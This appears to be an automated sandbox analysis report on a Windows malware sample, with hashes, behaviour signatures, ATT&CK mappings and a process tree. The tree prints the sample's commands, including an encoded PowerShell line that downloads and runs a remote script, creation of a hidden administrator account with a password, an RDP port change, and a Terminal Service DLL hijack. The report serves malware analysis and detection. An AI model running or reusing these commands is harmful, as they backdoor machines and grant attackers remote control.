Analysis

  • max time kernel
    129s
  • max time network
    116s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-11-2020 22:40

General

  • Target

    fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe

  • Size

    3.4MB

  • MD5

    e8b8bd2c147f0bf4aa3762b32b778351

  • SHA1

    a022f98fc7f16cb849ea2b6826eedd077db2360b

  • SHA256

    fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1

  • SHA512

    0f0591aa79c39bd01cc7fe9b654e2709975c0eb47dce2abb8ddd2d7b49be8015a94b8f284a5ce94295ed7ebcecf6ded4346702672271b665d8873040938c9a9b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 10 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 41 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 127 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe
    "C:\Users\Admin\AppData\Local\Temp\fb0da3d1d73bcd19970b18199109682c3eadacf33c066a02d17f1dd1f38275b1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:288
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ukg1is1\5ukg1is1.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1564
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5541.tmp" "c:\Users\Admin\AppData\Local\Temp\5ukg1is1\CSC2C4663DCF3F94C11B4694F98CA1C7E36.TMP"
          4⤵
            PID:332
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:840
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1256
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:912
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:892
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1696
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1872
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1272
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:288
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1628
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1624
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:788
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1712
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1892
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1840
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:440
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:372
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                    PID:1028
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      4⤵
                        PID:1480
                        • C:\Windows\system32\net.exe
                          net start TermService
                          5⤵
                            PID:1368
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 start TermService
                              6⤵
                                PID:952
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                          3⤵
                            PID:1716
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                            3⤵
                              PID:1608
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe user updwin Ghasar4f5 /del
                          1⤵
                            PID:1720
                            • C:\Windows\system32\net.exe
                              net.exe user updwin Ghasar4f5 /del
                              2⤵
                                PID:1608
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                                  3⤵
                                    PID:892
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user updwin 7MBF7Yk7 /add
                                1⤵
                                  PID:1576
                                  • C:\Windows\system32\net.exe
                                    net.exe user updwin 7MBF7Yk7 /add
                                    2⤵
                                      PID:1700
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user updwin 7MBF7Yk7 /add
                                        3⤵
                                          PID:1272
                                    • C:\Windows\System32\cmd.exe
                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                      1⤵
                                        PID:1948
                                        • C:\Windows\system32\net.exe
                                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                                          2⤵
                                            PID:1756
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                                              3⤵
                                                PID:1392
                                          • C:\Windows\System32\cmd.exe
                                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                            1⤵
                                              PID:332
                                              • C:\Windows\system32\net.exe
                                                net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                2⤵
                                                  PID:1712
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                    3⤵
                                                      PID:1924
                                                • C:\Windows\System32\cmd.exe
                                                  cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                                                  1⤵
                                                    PID:928
                                                    • C:\Windows\system32\net.exe
                                                      net.exe LOCALGROUP "Administrators" updwin /ADD
                                                      2⤵
                                                        PID:1840
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                                          3⤵
                                                            PID:1128
                                                      • C:\Windows\System32\cmd.exe
                                                        cmd /C net.exe user updwin 7MBF7Yk7
                                                        1⤵
                                                          PID:652
                                                          • C:\Windows\system32\net.exe
                                                            net.exe user updwin 7MBF7Yk7
                                                            2⤵
                                                              PID:912
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user updwin 7MBF7Yk7
                                                                3⤵
                                                                  PID:892
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd.exe /C wmic path win32_VideoController get name
                                                              1⤵
                                                                PID:876
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic path win32_VideoController get name
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1792
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic CPU get NAME
                                                                1⤵
                                                                  PID:960
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic CPU get NAME
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:788
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                  1⤵
                                                                    PID:1924
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      2⤵
                                                                        PID:932
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          3⤵
                                                                          • Blacklisted process makes network request
                                                                          • Drops file in Windows directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:968

                                                                    Network

                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                    Persistence

                                                                    Account Manipulation

                                                                    1
                                                                    T1098

                                                                    Registry Run Keys / Startup Folder

                                                                    1
                                                                    T1060

                                                                    Modify Existing Service

                                                                    1
                                                                    T1031

                                                                    Defense Evasion

                                                                    Modify Registry

                                                                    3
                                                                    T1112

                                                                    File Permissions Modification

                                                                    1
                                                                    T1222

                                                                    Lateral Movement

                                                                    Remote Desktop Protocol

                                                                    1
                                                                    T1076

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\5ukg1is1\5ukg1is1.dll
                                                                      MD5

                                                                      3c0d17d9e5544988e0b02e608d320503

                                                                      SHA1

                                                                      0b99e92cdc76443142a0fe335c3370107c3aa350

                                                                      SHA256

                                                                      84a1c57c85184d13ff20eb57d676dcce0bf56c08fc74c4f4334a90c401322c96

                                                                      SHA512

                                                                      cf44e71f75dc2a9e73d0e2c17f3e631abe47c994e08dd2d3046935322f25ed6c105a7c0338968a9eacb2ebafbfe4a3e957ef527778df3cbd6fa95ab780019190

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES5541.tmp
                                                                      MD5

                                                                      e79be5239e9a000e7597332be30c212e

                                                                      SHA1

                                                                      dcba260f287cb0ee1ad08f129c03006bf507756c

                                                                      SHA256

                                                                      958df70d615d1d96c85d92010733f3d547edbdd305f6bc8b486598b3433f9b4e

                                                                      SHA512

                                                                      7612f4dabc7b6c2d21bcde11ea9c73b9581559c85960f0239ad762d301d540f53bb9b3f9dbcf0fa3bfa8aa9803e6014e66d002433fc4cd294574800b80408abe

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                      MD5

                                                                      dac6b25db50155c0c78d5bf64fb95fa3

                                                                      SHA1

                                                                      9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                                                      SHA256

                                                                      6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                                                      SHA512

                                                                      679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                                                    • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                                                      MD5

                                                                      7cac19b2868c41555db4b71219217f9b

                                                                      SHA1

                                                                      d6f77db578db3c5c572c3a944d9072ed00560dcb

                                                                      SHA256

                                                                      d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                                                      SHA512

                                                                      5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                                                    • C:\Windows\system32\rfxvmt.dll
                                                                      MD5

                                                                      dc39d23e4c0e681fad7a3e1342a2843c

                                                                      SHA1

                                                                      58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                      SHA256

                                                                      6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                      SHA512

                                                                      5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\PIPE\samr
                                                                      MD5

                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                      SHA1

                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                      SHA256

                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                      SHA512

                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\5ukg1is1\5ukg1is1.0.cs
                                                                      MD5

                                                                      6f235215132cdebacd0f793fe970d0e3

                                                                      SHA1

                                                                      2841e44c387ed3b6f293611992f1508fe9b55b89

                                                                      SHA256

                                                                      ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                                                      SHA512

                                                                      a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\5ukg1is1\5ukg1is1.cmdline
                                                                      MD5

                                                                      49a635e2aa8c5db6c70777096c3ee1d8

                                                                      SHA1

                                                                      d0cf9b18d82c414f19eaa6b71718e8735b7ad336

                                                                      SHA256

                                                                      2b06ec1b3b70acf7475c0cd237e568c2613e5f0a6f30171e7cf9d38596c4610f

                                                                      SHA512

                                                                      abda96c89d9f53deab1dd477856946866e02562617f21cad71d3ae86819827e822fcd34c5ccd3152ff5f8092caea865f4fd8eb41d734c3c886ff5c9720f0ee5c

                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\5ukg1is1\CSC2C4663DCF3F94C11B4694F98CA1C7E36.TMP
                                                                      MD5

                                                                      35f3701f213212173ecd75a6783c362c

                                                                      SHA1

                                                                      7df7e564b245782c951491a09a8f524d16983034

                                                                      SHA256

                                                                      10e2e4f4a6550361f3be27a3dbb060b9877daf32d86be02be89ef0d4e2ee4d81

                                                                      SHA512

                                                                      20649620207646f32ec46d6d2ed1c864847ab78b210009132f1d428fae74fdfd4903344fa0547aa74de47cbac6c86002e0278ed18fefed979ad8fd1f1de26982

                                                                    • \Windows\Branding\mediasrv.png
                                                                      MD5

                                                                      eeb448ea2709c57b9ea2e223d0c79396

                                                                      SHA1

                                                                      38331dd027386151ee37a29a7820570a76427b02

                                                                      SHA256

                                                                      c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                                                      SHA512

                                                                      c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                                                    • \Windows\Branding\mediasvc.png
                                                                      MD5

                                                                      bb873bd05a47f502ee4ed3c4ea749a4f

                                                                      SHA1

                                                                      e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                                                      SHA256

                                                                      a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                                                      SHA512

                                                                      ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                                                    • memory/288-0-0x00000000010C0000-0x00000000013FD000-memory.dmp
                                                                      Filesize

                                                                      3.2MB

                                                                    • memory/288-1-0x0000000001400000-0x0000000001411000-memory.dmp
                                                                      Filesize

                                                                      68KB

                                                                    • memory/288-46-0x0000000000000000-mapping.dmp
                                                                    • memory/332-13-0x0000000000000000-mapping.dmp
                                                                    • memory/372-54-0x0000000000000000-mapping.dmp
                                                                    • memory/440-53-0x0000000000000000-mapping.dmp
                                                                    • memory/788-78-0x0000000000000000-mapping.dmp
                                                                    • memory/788-49-0x0000000000000000-mapping.dmp
                                                                    • memory/840-36-0x0000000000000000-mapping.dmp
                                                                    • memory/892-62-0x0000000000000000-mapping.dmp
                                                                    • memory/892-75-0x0000000000000000-mapping.dmp
                                                                    • memory/892-42-0x0000000000000000-mapping.dmp
                                                                    • memory/912-74-0x0000000000000000-mapping.dmp
                                                                    • memory/912-41-0x0000000000000000-mapping.dmp
                                                                    • memory/932-79-0x0000000000000000-mapping.dmp
                                                                    • memory/952-58-0x0000000000000000-mapping.dmp
                                                                    • memory/968-108-0x000000001A9B0000-0x000000001A9B1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-81-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/968-80-0x0000000000000000-mapping.dmp
                                                                    • memory/968-116-0x000000001AD90000-0x000000001AD91000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-107-0x000000001A980000-0x000000001A981000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-100-0x000000001A990000-0x000000001A991000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-99-0x000000001A980000-0x000000001A981000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-98-0x0000000019FD0000-0x0000000019FD1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-97-0x00000000193E0000-0x00000000193E1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-96-0x00000000193D0000-0x00000000193D1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-91-0x0000000019F90000-0x0000000019F91000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/968-115-0x000000001AAF0000-0x000000001AAF1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1028-55-0x0000000000000000-mapping.dmp
                                                                    • memory/1100-40-0x0000000000000000-mapping.dmp
                                                                    • memory/1128-72-0x0000000000000000-mapping.dmp
                                                                    • memory/1256-39-0x0000000000000000-mapping.dmp
                                                                    • memory/1272-64-0x0000000000000000-mapping.dmp
                                                                    • memory/1272-45-0x0000000000000000-mapping.dmp
                                                                    • memory/1368-57-0x0000000000000000-mapping.dmp
                                                                    • memory/1392-67-0x0000000000000000-mapping.dmp
                                                                    • memory/1480-56-0x0000000000000000-mapping.dmp
                                                                    • memory/1564-10-0x0000000000000000-mapping.dmp
                                                                    • memory/1608-61-0x0000000000000000-mapping.dmp
                                                                    • memory/1608-88-0x0000000000000000-mapping.dmp
                                                                    • memory/1624-48-0x0000000000000000-mapping.dmp
                                                                    • memory/1628-47-0x0000000000000000-mapping.dmp
                                                                    • memory/1688-18-0x000000001AA60000-0x000000001AA61000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-2-0x0000000000000000-mapping.dmp
                                                                    • memory/1688-38-0x00000000022D0000-0x00000000022E0000-memory.dmp
                                                                      Filesize

                                                                      64KB

                                                                    • memory/1688-17-0x00000000024C0000-0x00000000024C1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-7-0x00000000024A0000-0x00000000024A1000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-6-0x000000001AA10000-0x000000001AA11000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-5-0x000000001AB30000-0x000000001AB31000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-4-0x0000000002450000-0x0000000002451000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-35-0x000000001B710000-0x000000001B711000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-3-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp
                                                                      Filesize

                                                                      9.9MB

                                                                    • memory/1688-34-0x0000000002310000-0x0000000002311000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-21-0x000000001B580000-0x000000001B581000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-33-0x0000000002300000-0x0000000002301000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1688-9-0x000000001C330000-0x000000001C331000-memory.dmp
                                                                      Filesize

                                                                      4KB

                                                                    • memory/1696-43-0x0000000000000000-mapping.dmp
                                                                    • memory/1700-63-0x0000000000000000-mapping.dmp
                                                                    • memory/1712-50-0x0000000000000000-mapping.dmp
                                                                    • memory/1712-69-0x0000000000000000-mapping.dmp
                                                                    • memory/1716-87-0x0000000000000000-mapping.dmp
                                                                    • memory/1756-66-0x0000000000000000-mapping.dmp
                                                                    • memory/1792-77-0x0000000000000000-mapping.dmp
                                                                    • memory/1840-52-0x0000000000000000-mapping.dmp
                                                                    • memory/1840-71-0x0000000000000000-mapping.dmp
                                                                    • memory/1872-44-0x0000000000000000-mapping.dmp
                                                                    • memory/1892-51-0x0000000000000000-mapping.dmp
                                                                    • memory/1924-70-0x0000000000000000-mapping.dmp